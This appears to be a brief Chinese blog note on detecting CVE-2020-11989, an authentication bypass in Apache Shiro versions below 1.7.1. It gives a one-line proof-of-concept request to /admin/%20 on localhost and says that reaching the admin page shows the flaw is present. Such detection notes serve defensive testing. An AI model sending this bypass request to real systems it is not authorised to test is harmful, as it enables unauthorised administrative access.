【笔记】CVE-2020-11989漏洞检测 发表于 2024-06-26 更新于 2026-01-02 阅读次数: 前言Java的Shiro框架漏洞检测 漏洞利用前提 Apache Shiro < 1.7.1 pocrequest1GET http://127.0.0.1:80/admin/%20 如果可以绕过Shiro直接进入管理员页面,说明存在漏洞 完成